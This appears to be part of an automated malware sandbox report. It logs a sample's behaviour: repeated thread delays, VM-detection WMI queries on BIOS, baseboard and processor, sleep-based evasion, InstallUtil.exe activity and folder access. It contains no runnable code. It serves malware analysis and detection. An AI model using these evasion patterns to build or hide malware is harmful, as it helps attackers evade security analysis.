Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99546s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99433s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99320s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99203s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99093s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98979s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98872s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98715s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98604s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98393s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98232s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97984s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97827s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97718s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97607s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97499s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97390s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97280s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97171s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97062s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96953s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96843s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96734s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96587s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96468s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96359s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96249s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96140s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96030s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95921s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95811s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95702s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95573s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95461s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95210s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95093s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94984s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94872s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94765s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94655s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94546s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94437s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94327s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94217s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94109s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -93999s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -93890s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -93781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7568 Thread sleep count: 3097 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7624 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7568 Thread sleep count: 2005 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7808 Thread sleep count: 3747 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7808 Thread sleep count: 6081 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99479s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99046s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98608s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97495s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97358s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97244s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97098s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96349s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95351s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -94922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799967s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799749s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799530s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799419s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799258s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798853s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798746s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798531s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99762 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99433 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99320 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99093 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98979 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98872 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98715 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98604 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98393 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98232 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97827 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97607 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97499 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97280 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97062 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96953 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96843 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96734 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96587 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96468 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96359 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96249 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96140 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96030 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95921 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95811 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95702 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95573 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95461 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95210 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95093 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94872 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94655 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94327 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94217 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 93999 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 93890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 93781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799419
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798531
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
